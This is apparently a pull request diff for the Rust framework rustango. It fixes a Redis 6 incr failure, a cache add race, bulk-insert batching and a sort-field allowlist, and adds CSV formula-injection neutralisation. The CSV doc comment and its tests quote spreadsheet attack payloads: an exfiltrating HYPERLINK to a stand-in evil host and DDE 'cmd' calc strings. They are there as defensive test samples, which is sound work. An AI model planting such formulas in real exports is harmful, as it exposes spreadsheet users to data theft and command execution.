### PR TITLE
fix: bug batch — Redis 6 incr, DatabaseCache add atomicity, bulk_insert batching, CSV formula injection, ordering allowlist

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -508,6 +508,11 @@ jobs:
       - run: cargo test -p rustango --features mysql,tenancy --test tenancy_manage_mysql_live
       - run: cargo test -p rustango --features mysql,tenancy,testkit --test permissions_mysql_live
       - run: cargo test -p rustango --features mysql,tenancy,testkit --test database_pools_mysql_live
+      # #1281 — the MySQL arm of DatabaseCache::add is bespoke SQL
+      # (INSERT IGNORE + conditional UPDATE, since ON DUPLICATE KEY
+      # UPDATE takes no WHERE). It is also positional-`?`, so a bind
+      # ordering that Postgres' numbered `$n` tolerates breaks here.
+      - run: cargo test -p rustango --features mysql,cache --test cache_db_backend_add_live
       - run: cargo test -p rustango --features mysql,tenancy,mcp,testkit --test mcp_user_keys_mysql_live
       - run: cargo test -p rustango --features mysql --test audit_mysql_live
       - run: cargo test -p rustango --features mysql --test fixtures_mysql_live

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -425,6 +425,41 @@ jobs:
             --test django6_writes \
             --test django6_delta
 
+  # Redis live suite. `cache-redis` is off by default, so until #1280
+  # there was no Redis service here at all and nothing exercised
+  # `RedisCache` — which is how `incr` shipped using `EXPIRE … NX`, a
+  # Redis 7.0+ form. On 6.x every call errored, and both callers fail
+  # open, so rate limiting and account lockout silently did nothing.
+  #
+  # The matrix is the point: run the SAME suite against 6 and 7. A
+  # 7-only job passes on the broken code and proves nothing.
+  redis_live:
+    runs-on: ubuntu-latest
+    strategy:
+      fail-fast: false
+      matrix:
+        redis: ["6", "7"]
+    services:
+      redis:
+        # AWS Public ECR mirror — same Docker Hub rate-limit reason as
+        # the `postgres_test` / `mysql_live` services.
+        image: public.ecr.aws/docker/library/redis:${{ matrix.redis }}
+        ports:
+          - 6379:6379
+        options: >-
+          --health-cmd "redis-cli ping"
+          --health-interval 2s
+          --health-timeout 2s
+          --health-retries 30
+    env:
+      REDIS_TEST_URL: redis://127.0.0.1:6379/
+    steps:
+      - uses: actions/checkout@v4
+      - uses: dtolnay/rust-toolchain@1.88
+      - uses: Swatinem/rust-cache@v2
+      - run: cargo test -p rustango --features cache,cache-redis --test cache_redis_incr_live
+      - run: cargo test -p rustango --features cache,cache-redis --test cache_redis_prefix_live
+
   # v0.41 MySQL parity — the marketing claim is tri-dialect end-to-end
   # since v0.38, but every MySQL `_live.rs` test was skipped silently
   # in CI because `MYSQL_TEST_URL` was never set. This job runs the

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -512,7 +512,16 @@ jobs:
       # (INSERT IGNORE + conditional UPDATE, since ON DUPLICATE KEY
       # UPDATE takes no WHERE). It is also positional-`?`, so a bind
       # ordering that Postgres' numbered `$n` tolerates breaks here.
-      - run: cargo test -p rustango --features mysql,cache --test cache_db_backend_add_live
+      #
+      # `--no-default-features` matters: the default set includes
+      # `postgres`, which would compile this file's Postgres case into a
+      # job that runs no Postgres service. `DATABASE_URL` is defined
+      # workflow-wide, so that case would find the variable set, dial a
+      # server that is not there, and spend 30s timing out. The test
+      # skips unreachable backends rather than failing, but not building
+      # the arm at all is both faster and more honest about what this
+      # job covers. Postgres is exercised by `postgres_test`.
+      - run: cargo test -p rustango --no-default-features --features mysql,cache --test cache_db_backend_add_live
       - run: cargo test -p rustango --features mysql,tenancy,mcp,testkit --test mcp_user_keys_mysql_live
       - run: cargo test -p rustango --features mysql --test audit_mysql_live
       - run: cargo test -p rustango --features mysql --test fixtures_mysql_live

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,70 @@ All notable changes to rustango. The format follows [Keep a Changelog](https://k
 
 ## [Unreleased]
 
+### Security
+- **Rate limiting and account lockout silently did nothing on Redis 6.x**
+  (#1280). `RedisCache::incr` set its window TTL with `EXPIRE key secs NX`, and
+  the `NX` flag is Redis **7.0+**; on 6.x the server rejects the command, so
+  `incr` returned `Err` on every call. Both callers fail open — the rate
+  limiter returns `Ok((0, 0))` and account lockout `unwrap_or(0)`, never
+  reaching `max_attempts` — so neither control engaged, with no signal beyond a
+  per-request warning. The `INCRBY` had already landed, so counters were also
+  created with no TTL and never expired.
+
+  Now a single `EVAL` script does the increment and a conditional expiry
+  together, preserving the set-TTL-only-once semantic a fixed window needs.
+  `EVAL` is Redis 2.6+, so it works on 6.x and managed hosts alike. Verified
+  against real 6.2 and 7.4 servers; CI now runs the Redis suite as a 6-and-7
+  matrix, since a 7-only job passes on the broken code.
+
+  Account lockout still fails open on a cache error (locking every account out
+  during an outage is its own denial of service) but now logs a warning instead
+  of failing silently.
+- **CSV export did not neutralise spreadsheet formula injection** (#1283,
+  CWE-1236). A cell beginning `=`, `+`, `-`, `@` (or tab/CR) was written
+  verbatim and evaluated on open in Excel / LibreOffice / Sheets; RFC 4180
+  quoting does not help, since the quotes are stripped before the cell is
+  parsed. Reachable via the module's own documented recipe — exporting user
+  names and emails for an operator to download.
+
+  Such values are now prefixed with `'`. Numbers are deliberately exempt so
+  exports full of negative numbers are not mangled. New
+  `csv::neutralize_formula`; opt out with `CsvWriter::raw_formulas()` for
+  machine-consumed output.
+- **`?ordering=` accepted columns the ViewSet does not expose** (#1282). With
+  no explicit `ordering_fields`, the allowlist check was skipped entirely, so a
+  ViewSet declaring `fields = "id, title"` still honoured
+  `?ordering=password_hash` — a sort oracle over a column the API never
+  returns. The allowlist now defaults to the exposed field set, matching DRF.
+  Where `fields` is unset every column is exposed anyway, so that case is
+  unchanged.
+
+### Fixed
+- **`DistributedLock` provided no mutual exclusion on `DatabaseCache`**
+  (#1281). `DatabaseCache` never overrode `Cache::add`, inheriting the trait
+  default — `exists()` then `set()`, a check-then-act whose `set` is an
+  unconditional upsert. Two racers both saw "absent", both wrote, and both got
+  `Ok(true)`. Measured: 16 concurrent acquirers produced **13 winners**; now
+  exactly one.
+
+  `add` now takes the row only when absent or already expired. Postgres and
+  SQLite use one `ON CONFLICT … DO UPDATE … WHERE`; MySQL, which has no `WHERE`
+  on `ON DUPLICATE KEY UPDATE`, uses `INSERT IGNORE` plus a conditional
+  `UPDATE`. `expires = 0` still means never, so a live persistent entry is
+  never stolen.
+- **`bulk_insert_pool` ignored the backend's bind-parameter ceiling** (#1284).
+  A multi-row `INSERT` binds `rows × columns` parameters and every backend caps
+  that — 65535 on Postgres, 32766 on modern SQLite — so a large import failed
+  with an opaque driver error (`too many SQL variables`) having inserted
+  nothing. It now batches, via the new `Dialect::max_bind_params`. Inserts
+  under the ceiling are byte-for-byte unchanged.
+
+  As in Django, a batch split across statements is no longer atomic: a mid-way
+  failure leaves earlier chunks committed. Wrap the call in a transaction when
+  you need all-or-nothing. The Postgres-only generated `Model::bulk_insert` is
+  not yet batched — it routes through an executor consumed per call and does
+  `RETURNING` PK write-back; #1284 stays open for that.
+
 ### Added
 - **MCP: the raw `prefix.secret` credential is accepted as the Bearer token.**
   A show-once agent key now works directly in any MCP client

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1997,6 +1997,7 @@ dependencies = [
  "percent-encoding",
  "pin-project-lite",
  "ryu",
+ "sha1_smol",
  "tokio",
  "tokio-util",
  "url",
@@ -2427,6 +2428,12 @@ dependencies = [
  "cpufeatures 0.2.17",
  "digest",
 ]
+
+[[package]]
+name = "sha1_smol"
+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bbfa15b3dddfee50a0fff136974b3e1bde555604ba463834a7eb7deb6417705d"
 
 [[package]]
 name = "sha2"
@@ -2915,9 +2922,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -115,7 +115,7 @@ p256 = { version = "0.13", default-features = false, features = ["ecdsa", "std"]
 tera = { version = "1.20", default-features = false }
 
 # Caching
-redis = { version = "0.27", default-features = false, features = ["tokio-comp", "connection-manager"] }
+redis = { version = "0.27", default-features = false, features = ["tokio-comp", "connection-manager", "script"] }
 
 # OAuth2 / OIDC HTTP client (rustls — no openssl footprint)
 reqwest = { version = "0.12", default-features = false, features = ["json", "rustls-tls"] }

--- a/crates/cargo-rustango/tests/generated_project_compiles.rs
+++ b/crates/cargo-rustango/tests/generated_project_compiles.rs
@@ -79,31 +79,6 @@ fn generate(template: &str, tag: &str) -> (PathBuf, PathBuf) {
     (work, root)
 }
 
-/// Work around upstream releases that do not compile.
-///
-/// **Temporary. Delete the whole function when the entry below clears.**
-///
-/// Every other build in this repo is protected by a committed `Cargo.lock`,
-/// but a *freshly scaffolded* project has none by definition — it resolves
-/// from scratch, so it picks up whatever was published minutes ago. That is
-/// not a hypothetical: `tinyvec` 1.13.0 shipped a `vec!` call that is not in
-/// scope under `alloc`-without-`std` (upstream Lokathor/tinyvec#225), and it
-/// arrives here four levels down via
-/// `sqlx-postgres → stringprep → unicode-normalization → tinyvec`. Nothing in
-/// the generated project or in rustango can be changed to make it build.
-///
-/// A failure here is ignored on purpose: if the bad version has been yanked or
-/// the dependency graph moved on, `cargo update --precise` errors, and that is
-/// fine — the pin simply is not needed any more.
-fn pin_broken_transitives(root: &Path) {
-    for (krate, good) in [("tinyvec", "1.12.0")] {
-        let _ = Command::new(env!("CARGO"))
-            .current_dir(root)
-            .args(["update", "-p", krate, "--precise", good])
-            .output();
-    }
-}
-
 /// `cargo check` the generated project, returning (compiled, warnings, log).
 ///
 /// Warnings are counted **only for the generated crate**, never for rustango.
@@ -116,7 +91,6 @@ fn pin_broken_transitives(root: &Path) {
 /// when there is nothing of yours to blame: anything the compiler says about it
 /// is the generator's (#1210).
 fn check(root: &Path, extra: &[&str]) -> (bool, usize, String) {
-    pin_broken_transitives(root);
     let out = Command::new(env!("CARGO"))
         .current_dir(root)
         .args(["check", "--message-format=json-diagnostic-rendered-ansi"])

--- a/crates/rustango/examples/admin_demo/Cargo.lock
+++ b/crates/rustango/examples/admin_demo/Cargo.lock
@@ -2510,9 +2510,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/auth_demo/Cargo.lock
+++ b/crates/rustango/examples/auth_demo/Cargo.lock
@@ -2551,9 +2551,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/cookbook_blog/Cargo.lock
+++ b/crates/rustango/examples/cookbook_blog/Cargo.lock
@@ -2528,9 +2528,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/getting_started_blog/Cargo.lock
+++ b/crates/rustango/examples/getting_started_blog/Cargo.lock
@@ -2523,9 +2523,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/mcp_demo/Cargo.lock
+++ b/crates/rustango/examples/mcp_demo/Cargo.lock
@@ -2156,9 +2156,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/orm_cookbook/Cargo.lock
+++ b/crates/rustango/examples/orm_cookbook/Cargo.lock
@@ -2509,9 +2509,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/tenant_user_extension/Cargo.lock
+++ b/crates/rustango/examples/tenant_user_extension/Cargo.lock
@@ -2132,9 +2132,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/src/account_lockout.rs
+++ b/crates/rustango/src/account_lockout.rs
@@ -147,13 +147,32 @@ impl Lockout {
         // `incr` is still get+set — acceptable for single-process use,
         // and the multi-replica deploy that needs cross-process
         // atomicity is on Redis anyway.
-        let next = u32::try_from(
-            self.cache
-                .incr(&counter_key, 1, Some(self.counter_ttl))
-                .await
-                .unwrap_or(0),
-        )
-        .unwrap_or(u32::MAX);
+        //
+        // A cache failure here means the attempt is NOT counted, so
+        // lockout silently stops engaging — the failure mode that let
+        // #1280 (Redis 6 + `EXPIRE … NX`) disable brute-force protection
+        // on every call with no signal at all. Keep failing open (a cache
+        // outage locking every account out is its own denial of service,
+        // and it matches `rate_limit_cache::take`'s documented policy)
+        // but make it loud, so "lockout isn't working" is diagnosable
+        // from the logs instead of invisible.
+        let counted = match self
+            .cache
+            .incr(&counter_key, 1, Some(self.counter_ttl))
+            .await
+        {
+            Ok(n) => n,
+            Err(e) => {
+                tracing::warn!(
+                    error = %e,
+                    account,
+                    "account-lockout counter failed; this failed attempt is NOT counted \
+                     and lockout will not engage"
+                );
+                0
+            }
+        };
+        let next = u32::try_from(counted).unwrap_or(u32::MAX);
         if next >= self.max_attempts {
             // Set the lock flag with TTL = lockout_duration
             let _ = self

--- a/crates/rustango/src/cache/db_backend.rs
+++ b/crates/rustango/src/cache/db_backend.rs
@@ -236,6 +236,108 @@ impl Cache for DatabaseCache {
         Ok(())
     }
 
+    /// Atomic set-if-absent (#1281).
+    ///
+    /// Without this override `DatabaseCache` inherited the trait default
+    /// — `exists()` then `set()` — which is a check-then-act across two
+    /// round trips, and `set` is an unconditional upsert, so two racers
+    /// both saw "absent", both wrote, and **both got `Ok(true)`**. That
+    /// silently voided `DistributedLock`'s entire guarantee on this
+    /// backend: two processes ran the same guarded body. Redis and
+    /// in-memory already overrode `add`; this was the third backend.
+    ///
+    /// An expired row must still be acquirable, so this is not a bare
+    /// `INSERT` — it takes the row when it is absent *or* already
+    /// expired, and reports whether it did. `expires = 0` means "never
+    /// expires" (see [`Self::expires_for`]), so a live persistent entry
+    /// is never stolen.
+    ///
+    /// The database does the test-and-set under row locks, so a race
+    /// resolves to exactly one winner: the loser's `WHERE` no longer
+    /// matches once the winner has pushed `expires` into the future.
+    async fn add(&self, key: &str, value: &str, ttl: Option<Duration>) -> Result<bool, CacheError> {
+        let dialect = self.pool.dialect();
+        let table = dialect.quote_ident(&self.table);
+        let p1 = dialect.placeholder(1);
+        let p2 = dialect.placeholder(2);
+        let p3 = dialect.placeholder(3);
+        let p4 = dialect.placeholder(4);
+        let expires = Self::expires_for(ttl);
+        let now = Self::now_unix_ms();
+
+        // Bind order is *textual* placeholder order, not logical order:
+        // MySQL and SQLite use positional `?`, so the args must appear in
+        // the sequence the placeholders do. (Postgres' numbered `$n`
+        // would tolerate any order, which is exactly how a MySQL-only
+        // mismatch stays hidden until a MySQL test runs it.)
+        if dialect.name() == "mysql" {
+            // MySQL's `ON DUPLICATE KEY UPDATE` takes no WHERE, so the
+            // conditional take is two statements. Both are individually
+            // atomic and the pair is still race-free: the INSERT settles
+            // the absent case, and for the expired case the UPDATE's own
+            // predicate is the compare-and-swap — whoever lands first
+            // moves `expires` forward and the other matches nothing.
+            let inserted = raw_execute_pool(
+                &self.pool,
+                &format!(
+                    "INSERT IGNORE INTO {table} (cache_key, value, expires) \
+                     VALUES ({p1}, {p2}, {p3})"
+                ),
+                vec![
+                    SqlValue::String(key.to_owned()),
+                    SqlValue::String(value.to_owned()),
+                    SqlValue::I64(expires),
+                ],
+            )
+            .await
+            .map_err(|e| CacheError::Connection(format!("add: {e}")))?;
+            if inserted == 1 {
+                return Ok(true);
+            }
+            let took = raw_execute_pool(
+                &self.pool,
+                &format!(
+                    "UPDATE {table} SET value = {p1}, expires = {p2} \
+                     WHERE cache_key = {p3} AND expires <> 0 AND expires <= {p4}"
+                ),
+                vec![
+                    SqlValue::String(value.to_owned()),
+                    SqlValue::I64(expires),
+                    SqlValue::String(key.to_owned()),
+                    SqlValue::I64(now),
+                ],
+            )
+            .await
+            .map_err(|e| CacheError::Connection(format!("add: {e}")))?;
+            return Ok(took == 1);
+        }
+
+        // Postgres and SQLite both support `ON CONFLICT … DO UPDATE …
+        // WHERE`, which expresses the whole thing in one statement:
+        // insert, or overwrite only an expired row. When the predicate
+        // fails nothing is written and the statement reports 0 rows.
+        let took = raw_execute_pool(
+            &self.pool,
+            &format!(
+                "INSERT INTO {table} (cache_key, value, expires) \
+                 VALUES ({p1}, {p2}, {p3}) \
+                 ON CONFLICT (cache_key) DO UPDATE \
+                 SET value = EXCLUDED.value, expires = EXCLUDED.expires \
+                 WHERE {table}.expires <> 0 AND {table}.expires <= {p4}"
+            ),
+            // Textual placeholder order — see the note above.
+            vec![
+                SqlValue::String(key.to_owned()),
+                SqlValue::String(value.to_owned()),
+                SqlValue::I64(expires),
+                SqlValue::I64(now),
+            ],
+        )
+        .await
+        .map_err(|e| CacheError::Connection(format!("add: {e}")))?;
+        Ok(took == 1)
+    }
+
     async fn delete(&self, key: &str) -> Result<(), CacheError> {
         let dialect = self.pool.dialect();
         let table = dialect.quote_ident(&self.table);

--- a/crates/rustango/src/cache/redis_backend.rs
+++ b/crates/rustango/src/cache/redis_backend.rs
@@ -195,25 +195,41 @@ impl Cache for RedisCache {
 
     async fn incr(&self, key: &str, by: i64, ttl: Option<Duration>) -> Result<i64, CacheError> {
         let mut conn = self.conn.clone();
-        let new: i64 = redis::cmd("INCRBY")
-            .arg(key)
+        // Increment and set the TTL *only if the key has none*, in one
+        // atomic server-side step.
+        //
+        // Setting the TTL on first creation only is what makes a
+        // fixed-window rate limiter work: an unconditional EXPIRE on
+        // every tick would slide the window forward forever and the
+        // limit would never be reached.
+        //
+        // This was `INCRBY` followed by `EXPIRE key secs NX` (#1280).
+        // The `NX` flag on EXPIRE is Redis **7.0+**; on 6.x the server
+        // answers `ERR wrong number of arguments for 'expire' command`,
+        // so `incr` returned `Err` on every call — and both callers fail
+        // open, silently disabling rate limiting
+        // (`rate_limit_cache::take`) and account lockout
+        // (`account_lockout`). Worse, the INCRBY had already landed, so
+        // each counter was created with no TTL at all and never expired.
+        //
+        // `EVAL` is Redis 2.6+, so the Lua form is portable to every
+        // version we could plausibly meet (and to ElastiCache /
+        // Cosmos / DocumentDB). `TTL` returns -1 for "exists, no
+        // expiry" and -2 for "missing"; after the INCRBY the key
+        // always exists, so `< 0` means "no expiry set".
+        let script = redis::Script::new(
+            r"local n = redis.call('INCRBY', KEYS[1], ARGV[1])
+              if tonumber(ARGV[2]) > 0 and redis.call('TTL', KEYS[1]) < 0 then
+                redis.call('EXPIRE', KEYS[1], ARGV[2])
+              end
+              return n",
+        );
+        script
+            .key(key)
             .arg(by)
-            .query_async(&mut conn)
+            .arg(self.effective_ttl(ttl).unwrap_or(0))
+            .invoke_async(&mut conn)
             .await
-            .map_err(|e| CacheError::Connection(e.to_string()))?;
-        // EXPIRE on first creation only — INCR-then-EXPIRE on every call
-        // would reset the window each tick, breaking fixed-window rate
-        // limiters. The NX flag is exactly the "set TTL only if no TTL"
-        // semantic we want.
-        if let Some(secs) = self.effective_ttl(ttl) {
-            let _: i64 = redis::cmd("EXPIRE")
-                .arg(key)
-                .arg(secs)
-                .arg("NX")
-                .query_async(&mut conn)
-                .await
-                .map_err(|e| CacheError::Connection(e.to_string()))?;
-        }
-        Ok(new)
+            .map_err(|e| CacheError::Connection(e.to_string()))
     }
 }

--- a/crates/rustango/src/csv.rs
+++ b/crates/rustango/src/csv.rs
@@ -77,6 +77,9 @@ fn json_cell_to_string(v: Option<&serde_json::Value>) -> String {
 pub struct CsvWriter {
     out: String,
     column_count: Option<usize>,
+    /// When `true` (the default) a value that would be read as a
+    /// spreadsheet formula is neutralised. See [`Self::raw_formulas`].
+    allow_formulas: bool,
 }
 
 impl CsvWriter {
@@ -124,15 +127,68 @@ impl CsvWriter {
         &self.out
     }
 
+    /// Opt out of formula neutralisation and emit values byte-for-byte.
+    ///
+    /// Only for CSV consumed by a machine. Anything a person may open in
+    /// Excel / LibreOffice / Sheets should keep the default — see
+    /// [`neutralize_formula`] for what it guards against.
+    #[must_use]
+    pub fn raw_formulas(mut self) -> Self {
+        self.allow_formulas = true;
+        self
+    }
+
     fn write_row(&mut self, row: &[String]) {
         for (i, field) in row.iter().enumerate() {
             if i > 0 {
                 self.out.push(',');
             }
-            self.out.push_str(&escape_field(field));
+            let field = if self.allow_formulas {
+                escape_field(field)
+            } else {
+                escape_field(&neutralize_formula(field))
+            };
+            self.out.push_str(&field);
         }
         self.out.push_str("\r\n");
     }
+}
+
+/// Defuse a cell that a spreadsheet would evaluate as a formula
+/// (CWE-1236, #1283).
+///
+/// Excel, LibreOffice and Google Sheets treat a leading `=`, `+`, `-`,
+/// `@` — and a leading tab or CR — as the start of a formula, so an
+/// exported value like
+///
+/// ```text
+/// =HYPERLINK("https://evil.example/?d="&A1,"Click for details")
+/// ```
+///
+/// runs on open. RFC 4180 quoting does not help: the quotes are stripped
+/// before the cell is parsed. The fix is to prefix the value with a
+/// single quote, which spreadsheets consume as "this is literal text".
+///
+/// **Numbers are left alone.** A blanket prefix would mangle every
+/// negative number in an export (`-5` → `'-5`), so a field that parses
+/// as a plain number passes through untouched — `-5` and `+3.14` are
+/// data, `-2+cmd|'/c calc'!A0` is not.
+#[must_use]
+pub fn neutralize_formula(s: &str) -> String {
+    let Some(first) = s.chars().next() else {
+        return s.to_owned();
+    };
+    if !matches!(first, '=' | '+' | '-' | '@' | '\t' | '\r') {
+        return s.to_owned();
+    }
+    // A well-formed number is not a formula, whatever it starts with.
+    if s.parse::<f64>().is_ok() {
+        return s.to_owned();
+    }
+    let mut out = String::with_capacity(s.len() + 1);
+    out.push('\'');
+    out.push_str(s);
+    out
 }
 
 /// Escape one CSV field per RFC 4180.
@@ -223,6 +279,76 @@ mod tests {
         w.headers(&["a", "b"]);
         w.row(&["1", "2", "3", "4"]); // long
         assert_eq!(w.into_string(), "a,b\r\n1,2\r\n");
+    }
+
+    // ---- #1283 formula injection ----
+
+    #[test]
+    fn leading_formula_triggers_are_neutralised() {
+        // The classic: an exfiltrating hyperlink in a user-set field.
+        assert_eq!(
+            neutralize_formula(r#"=HYPERLINK("http://evil/?"&A1,"x")"#),
+            r#"'=HYPERLINK("http://evil/?"&A1,"x")"#
+        );
+        assert_eq!(neutralize_formula("+SUM(A1)"), "'+SUM(A1)");
+        assert_eq!(neutralize_formula("@SUM(A1)"), "'@SUM(A1)");
+        assert_eq!(
+            neutralize_formula("-2+3+cmd|' /c calc'!A0"),
+            "'-2+3+cmd|' /c calc'!A0"
+        );
+        // Leading tab / CR are formula lead-ins in Excel too.
+        assert_eq!(neutralize_formula("\t=1+1"), "'\t=1+1");
+        assert_eq!(neutralize_formula("\r=1+1"), "'\r=1+1");
+    }
+
+    #[test]
+    fn numbers_are_not_mangled() {
+        // A blanket prefix would wreck every negative number in an
+        // export. These are data, not formulas.
+        for n in ["-5", "-5.25", "+3.14", "0", "1e6", "-1e-6"] {
+            assert_eq!(neutralize_formula(n), n, "{n} must pass through");
+        }
+    }
+
+    #[test]
+    fn ordinary_text_is_untouched() {
+        for s in ["", "plain", "a,b", "hello world", "user@example.com"] {
+            assert_eq!(neutralize_formula(s), s);
+        }
+    }
+
+    #[test]
+    fn writer_neutralises_by_default_and_still_quotes() {
+        let mut w = CsvWriter::new();
+        w.headers(["name"]);
+        w.row(["=1+1"]);
+        // Prefixed, and the leading quote does not itself force quoting.
+        assert_eq!(w.as_str(), "name\r\n'=1+1\r\n");
+
+        // A formula containing a comma still gets RFC 4180 quoting on
+        // top of the prefix.
+        let mut w = CsvWriter::new();
+        w.row(["=A1,B1"]);
+        assert_eq!(w.as_str(), "\"'=A1,B1\"\r\n");
+    }
+
+    #[test]
+    fn raw_formulas_opt_out_emits_verbatim() {
+        let mut w = CsvWriter::new().raw_formulas();
+        w.row(["=1+1"]);
+        assert_eq!(w.as_str(), "=1+1\r\n");
+    }
+
+    #[test]
+    fn json_export_helper_is_protected_by_default() {
+        // The shape csv_response.rs documents: user-controlled fields
+        // dumped for an operator to open.
+        let rows = vec![serde_json::json!({ "name": "=cmd|' /c calc'!A0" })];
+        let out = csv_from_json_rows(&["name"], &rows).into_string();
+        assert!(
+            out.contains("'=cmd"),
+            "exported user data must be neutralised: {out}"
+        );
     }
 
     #[test]

--- a/crates/rustango/src/sql/dialect.rs
+++ b/crates/rustango/src/sql/dialect.rs
@@ -120,6 +120,24 @@ pub trait Dialect {
         false
     }
 
+    /// Maximum bind parameters the backend accepts in one statement.
+    ///
+    /// Every backend has a ceiling, and a multi-row `INSERT` reaches it
+    /// at `rows × columns` (#1284):
+    ///
+    /// * **Postgres** — 65535, a hard protocol limit (the parameter
+    ///   count is an `int16` on the wire).
+    /// * **SQLite** — `SQLITE_MAX_VARIABLE_NUMBER`, 32766 since 3.32
+    ///   (999 before it; sqlx bundles a modern build).
+    /// * **MySQL** — no fixed cap; bounded by `max_allowed_packet`.
+    ///   65535 is a safe proxy well inside the default 64 MiB.
+    ///
+    /// The default is Postgres' figure — the most conservative of the
+    /// three that is also correct for a hard-limit backend.
+    fn max_bind_params(&self) -> usize {
+        65535
+    }
+
     /// Translate a `DEFAULT` expression authored in Postgres dialect
     /// (the rustango canonical form) to the target backend's spelling.
     /// `ty` is the field's `FieldType` token (e.g. `"json"`, `"datetime"`,

--- a/crates/rustango/src/sql/executor/mod.rs
+++ b/crates/rustango/src/sql/executor/mod.rs
@@ -1271,8 +1271,44 @@ pub async fn bulk_insert_pool(pool: &Pool, query: &BulkInsertQuery) -> Result<()
     if query.rows.is_empty() {
         return Ok(());
     }
-    let stmt = pool.dialect().compile_bulk_insert(query)?;
-    execute_pool(pool, &stmt.sql, stmt.params).await?;
+    // Every `pool.dialect()` here is a short-lived temporary, deliberately
+    // not bound to a variable: it yields `&dyn Dialect`, which is not
+    // `Sync`, so holding one across an `.await` makes this future non-Send
+    // and breaks every boxed handler that transitively calls it.
+    //
+    // Split into batches that fit the backend's bind-parameter ceiling
+    // (#1284). One multi-row INSERT binds `rows × columns` parameters,
+    // and every backend caps that — 65535 on Postgres (an int16 on the
+    // wire), 32766 on modern SQLite, `max_allowed_packet` on MySQL. A
+    // single statement past the cap fails with an opaque driver error,
+    // so an 8-column model died at ~8k rows on PG and ~4k on SQLite.
+    // Django's `bulk_create` batches for the same reason.
+    //
+    // Small inserts are untouched: under the ceiling this is the same
+    // single statement it always was. Only oversized batches split, and
+    // those previously failed outright.
+    //
+    // Note the trade-off, which matches Django's: above the threshold
+    // this is no longer one statement, so a mid-way failure leaves the
+    // earlier chunks committed. Callers needing all-or-nothing should
+    // wrap the call in a transaction.
+    let columns = query.columns.len().max(1);
+    let max_rows = (pool.dialect().max_bind_params() / columns).max(1);
+
+    if query.rows.len() <= max_rows {
+        let stmt = pool.dialect().compile_bulk_insert(query)?;
+        execute_pool(pool, &stmt.sql, stmt.params).await?;
+        return Ok(());
+    }
+
+    for chunk in query.rows.chunks(max_rows) {
+        let batch = BulkInsertQuery {
+            rows: chunk.to_vec(),
+            ..query.clone()
+        };
+        let stmt = pool.dialect().compile_bulk_insert(&batch)?;
+        execute_pool(pool, &stmt.sql, stmt.params).await?;
+    }
     Ok(())
 }
 

--- a/crates/rustango/src/sql/sqlite.rs
+++ b/crates/rustango/src/sql/sqlite.rs
@@ -78,6 +78,15 @@ impl Dialect for Sqlite {
         true
     }
 
+    /// `SQLITE_MAX_VARIABLE_NUMBER` — 32766 since SQLite 3.32 (it was
